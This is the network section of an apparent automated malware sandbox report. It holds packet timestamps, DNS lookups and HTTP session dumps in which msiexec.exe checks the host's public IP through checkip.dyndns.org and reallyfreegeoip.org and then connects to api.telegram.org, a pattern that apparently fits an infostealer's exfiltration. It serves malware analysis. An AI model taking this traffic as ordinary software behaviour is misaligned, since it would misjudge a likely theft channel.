                                                                            Oct 23, 2024 17:23:51.965926886 CEST49981443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:51.966216087 CEST49981443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:51.966227055 CEST44349981188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:52.053082943 CEST4997980192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:52.578707933 CEST44349981188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:52.582247019 CEST49981443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:52.582283020 CEST44349981188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:52.764178038 CEST44349981188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:52.764272928 CEST44349981188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:52.764327049 CEST49981443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:52.764774084 CEST49981443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:52.767657995 CEST4997980192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:52.768735886 CEST4998280192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:52.774132967 CEST8049982193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:23:52.774301052 CEST4998280192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:52.774347067 CEST4998280192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:52.774776936 CEST8049979193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:23:52.774828911 CEST4997980192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:52.779676914 CEST8049982193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:23:53.619740963 CEST8049982193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:23:53.621045113 CEST49983443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:53.621094942 CEST44349983188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:53.621167898 CEST49983443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:53.621398926 CEST49983443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:53.621414900 CEST44349983188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:53.756217003 CEST4998280192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:54.232800007 CEST44349983188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:54.234631062 CEST49983443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:54.234684944 CEST44349983188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:54.408549070 CEST44349983188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:54.408647060 CEST44349983188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:54.408701897 CEST49983443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:54.409646988 CEST49983443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:54.416660070 CEST4998480192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:54.422172070 CEST8049984193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:23:54.422364950 CEST4998480192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:54.422478914 CEST4998480192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:54.427771091 CEST8049984193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:23:55.427388906 CEST8049984193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:23:55.429666042 CEST49985443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:55.429692984 CEST44349985188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:55.429760933 CEST49985443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:55.430042982 CEST49985443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:55.430063009 CEST44349985188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:55.474670887 CEST8049984193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:23:55.474879980 CEST4998480192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:56.036734104 CEST44349985188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:56.038397074 CEST49985443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:56.038420916 CEST44349985188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:56.200675964 CEST44349985188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:56.200764894 CEST44349985188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:56.200833082 CEST49985443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:56.201272011 CEST49985443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:56.205118895 CEST4998480192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:56.205955029 CEST4998680192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:56.211044073 CEST8049984193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:23:56.211169958 CEST4998480192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:56.211354017 CEST8049986193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:23:56.211421013 CEST4998680192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:56.211498976 CEST4998680192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:56.216783047 CEST8049986193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:23:57.044671059 CEST8049986193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:23:57.047118902 CEST49987443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:57.047168970 CEST44349987188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:57.047257900 CEST49987443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:57.047550917 CEST49987443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:57.047559977 CEST44349987188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:57.256329060 CEST4998680192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:57.666443110 CEST44349987188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:57.668138027 CEST49987443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:57.668157101 CEST44349987188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:57.815946102 CEST44349987188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:57.816051960 CEST44349987188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:57.816107988 CEST49987443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:57.816587925 CEST49987443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:57.824284077 CEST4998680192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:57.825223923 CEST4998880192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:57.830571890 CEST8049988193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:23:57.830636978 CEST4998880192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:57.830698013 CEST4998880192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:57.830796957 CEST8049986193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:23:57.830872059 CEST4998680192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:57.836173058 CEST8049988193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:23:58.656635046 CEST8049988193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:23:58.657913923 CEST49989443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:58.657962084 CEST44349989188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:58.658042908 CEST49989443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:58.658309937 CEST49989443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:58.658323050 CEST44349989188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:58.756228924 CEST4998880192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:59.263485909 CEST44349989188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:59.265067101 CEST49989443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:59.265105009 CEST44349989188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:59.465790987 CEST44349989188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:59.466085911 CEST44349989188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:59.466156960 CEST49989443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:59.466523886 CEST49989443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:59.469415903 CEST4998880192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:59.470630884 CEST4999080192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:59.475500107 CEST8049988193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:23:59.475568056 CEST4998880192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:59.476005077 CEST8049990193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:23:59.476075888 CEST4999080192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:59.476228952 CEST4999080192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:59.481539011 CEST8049990193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:24:00.319535971 CEST8049990193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:24:00.320605040 CEST49991443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:00.320631027 CEST44349991188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:00.320692062 CEST49991443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:00.320975065 CEST49991443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:00.320986986 CEST44349991188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:00.459402084 CEST4999080192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:00.935925961 CEST44349991188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:00.937439919 CEST49991443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:00.937472105 CEST44349991188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:01.095837116 CEST44349991188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:01.095942020 CEST44349991188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:01.096015930 CEST49991443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:01.096452951 CEST49991443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:01.125804901 CEST4999080192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:01.126820087 CEST4999280192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:01.131552935 CEST8049990193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:24:01.131632090 CEST4999080192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:01.132270098 CEST8049992193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:24:01.132339001 CEST4999280192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:01.134186029 CEST4999280192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:01.139560938 CEST8049992193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:24:01.978270054 CEST8049992193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:24:01.979505062 CEST49993443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:01.979543924 CEST44349993188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:01.979609013 CEST49993443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:01.979840040 CEST49993443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:01.979856968 CEST44349993188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:02.021859884 CEST4999280192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:02.598795891 CEST44349993188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:02.600967884 CEST49993443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:02.601001024 CEST44349993188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:02.766535997 CEST44349993188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:02.766624928 CEST44349993188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:02.766680002 CEST49993443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:02.767633915 CEST49993443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:02.772936106 CEST4999280192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:02.774406910 CEST4999480192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:02.778822899 CEST8049992193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:24:02.778902054 CEST4999280192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:02.779793024 CEST8049994193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:24:02.779866934 CEST4999480192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:02.780071020 CEST4999480192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:02.785413980 CEST8049994193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:24:03.615462065 CEST8049994193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:24:03.617264032 CEST49995443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:03.617311001 CEST44349995188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:03.617376089 CEST49995443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:03.617609024 CEST49995443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:03.617624998 CEST44349995188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:03.662590981 CEST4999480192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:04.236339092 CEST44349995188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:04.248275042 CEST49995443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:04.248313904 CEST44349995188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:04.407182932 CEST44349995188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:04.407272100 CEST44349995188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:04.407325983 CEST49995443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:04.407694101 CEST49995443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:04.437292099 CEST4999480192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:04.443376064 CEST8049994193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:24:04.443474054 CEST4999480192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:04.444940090 CEST49996443192.168.2.10149.154.167.220
                                                                            Oct 23, 2024 17:24:04.444972038 CEST44349996149.154.167.220192.168.2.10
                                                                            Oct 23, 2024 17:24:04.445038080 CEST49996443192.168.2.10149.154.167.220
                                                                            Oct 23, 2024 17:24:04.445408106 CEST49996443192.168.2.10149.154.167.220
                                                                            Oct 23, 2024 17:24:04.445422888 CEST44349996149.154.167.220192.168.2.10
                                                                            Oct 23, 2024 17:24:05.301359892 CEST44349996149.154.167.220192.168.2.10
                                                                            Oct 23, 2024 17:24:05.301451921 CEST49996443192.168.2.10149.154.167.220
                                                                            Oct 23, 2024 17:24:05.306741953 CEST49996443192.168.2.10149.154.167.220
                                                                            Oct 23, 2024 17:24:05.306771040 CEST44349996149.154.167.220192.168.2.10
                                                                            Oct 23, 2024 17:24:05.307034969 CEST44349996149.154.167.220192.168.2.10
                                                                            Oct 23, 2024 17:24:05.311036110 CEST49996443192.168.2.10149.154.167.220
                                                                            Oct 23, 2024 17:24:05.355334044 CEST44349996149.154.167.220192.168.2.10
                                                                            Oct 23, 2024 17:24:05.561148882 CEST44349996149.154.167.220192.168.2.10
                                                                            Oct 23, 2024 17:24:05.561218977 CEST44349996149.154.167.220192.168.2.10
                                                                            Oct 23, 2024 17:24:05.561331987 CEST49996443192.168.2.10149.154.167.220
                                                                            Oct 23, 2024 17:24:05.564305067 CEST49996443192.168.2.10149.154.167.220
                                                                            Oct 23, 2024 17:24:11.291395903 CEST4998280192.168.2.10193.122.6.168
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 23, 2024 17:22:59.384814024 CEST5825553192.168.2.101.1.1.1
                                                                            Oct 23, 2024 17:22:59.392741919 CEST53582551.1.1.1192.168.2.10
                                                                            Oct 23, 2024 17:23:00.662866116 CEST5740553192.168.2.101.1.1.1
                                                                            Oct 23, 2024 17:23:00.671067953 CEST53574051.1.1.1192.168.2.10
                                                                            Oct 23, 2024 17:23:48.864517927 CEST6070253192.168.2.101.1.1.1
                                                                            Oct 23, 2024 17:23:48.871829033 CEST53607021.1.1.1192.168.2.10
                                                                            Oct 23, 2024 17:23:50.890582085 CEST6250553192.168.2.101.1.1.1
                                                                            Oct 23, 2024 17:23:50.898956060 CEST53625051.1.1.1192.168.2.10
                                                                            Oct 23, 2024 17:24:04.437218904 CEST6385753192.168.2.101.1.1.1
                                                                            Oct 23, 2024 17:24:04.444411039 CEST53638571.1.1.1192.168.2.10
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Oct 23, 2024 17:22:59.384814024 CEST192.168.2.101.1.1.10x20e6Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                            Oct 23, 2024 17:23:00.662866116 CEST192.168.2.101.1.1.10x3642Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                            Oct 23, 2024 17:23:48.864517927 CEST192.168.2.101.1.1.10x2f45Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                            Oct 23, 2024 17:23:50.890582085 CEST192.168.2.101.1.1.10x5170Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                            Oct 23, 2024 17:24:04.437218904 CEST192.168.2.101.1.1.10x4e28Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Oct 23, 2024 17:22:51.739751101 CEST1.1.1.1192.168.2.100x26bdNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Oct 23, 2024 17:22:51.739751101 CEST1.1.1.1192.168.2.100x26bdNo error (0)dual.s-part-0044.t-0009.fb-t-msedge.nets-part-0044.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Oct 23, 2024 17:22:51.739751101 CEST1.1.1.1192.168.2.100x26bdNo error (0)s-part-0044.t-0009.fb-t-msedge.net13.107.253.72A (IP address)IN (0x0001)false
                                                                            Oct 23, 2024 17:22:59.392741919 CEST1.1.1.1192.168.2.100x20e6No error (0)drive.google.com142.250.185.206A (IP address)IN (0x0001)false
                                                                            Oct 23, 2024 17:23:00.671067953 CEST1.1.1.1192.168.2.100x3642No error (0)drive.usercontent.google.com142.250.185.65A (IP address)IN (0x0001)false
                                                                            Oct 23, 2024 17:23:48.871829033 CEST1.1.1.1192.168.2.100x2f45No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                            Oct 23, 2024 17:23:48.871829033 CEST1.1.1.1192.168.2.100x2f45No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                            Oct 23, 2024 17:23:48.871829033 CEST1.1.1.1192.168.2.100x2f45No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                            Oct 23, 2024 17:23:48.871829033 CEST1.1.1.1192.168.2.100x2f45No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                            Oct 23, 2024 17:23:48.871829033 CEST1.1.1.1192.168.2.100x2f45No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                            Oct 23, 2024 17:23:48.871829033 CEST1.1.1.1192.168.2.100x2f45No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                            Oct 23, 2024 17:23:50.898956060 CEST1.1.1.1192.168.2.100x5170No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                            Oct 23, 2024 17:23:50.898956060 CEST1.1.1.1192.168.2.100x5170No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                            Oct 23, 2024 17:24:04.444411039 CEST1.1.1.1192.168.2.100x4e28No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                            • drive.google.com
                                                                            • drive.usercontent.google.com
                                                                            • reallyfreegeoip.org
                                                                            • api.telegram.org
                                                                            • checkip.dyndns.org
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.1049979193.122.6.168804104C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 23, 2024 17:23:48.881861925 CEST151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Oct 23, 2024 17:23:49.727170944 CEST323INHTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:23:49 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 17df42cb3fedb2e061f192eca8a023ab
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
                                                                            Oct 23, 2024 17:23:49.730627060 CEST127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Oct 23, 2024 17:23:49.978164911 CEST323INHTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:23:49 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 2a6931270943e05d6ffce4235bebd5fb
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
                                                                            Oct 23, 2024 17:23:51.716845036 CEST127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Oct 23, 2024 17:23:51.963577032 CEST323INHTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:23:51 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: e0d8659c0dfed77fe683fdfc85237dd9
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.1049982193.122.6.168804104C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 23, 2024 17:23:52.774347067 CEST127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Oct 23, 2024 17:23:53.619740963 CEST323INHTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:23:53 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 32f2baf2c1b942ceccca71eb897795ec
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.1049984193.122.6.168804104C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 23, 2024 17:23:54.422478914 CEST151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Oct 23, 2024 17:23:55.427388906 CEST323INHTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:23:55 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: ee95570c82ef1e5230bc5d087cc407a1
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
                                                                            Oct 23, 2024 17:23:55.474670887 CEST323INHTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:23:55 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: ee95570c82ef1e5230bc5d087cc407a1
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.1049986193.122.6.168804104C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 23, 2024 17:23:56.211498976 CEST151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Oct 23, 2024 17:23:57.044671059 CEST323INHTTP/1.1 200 OK
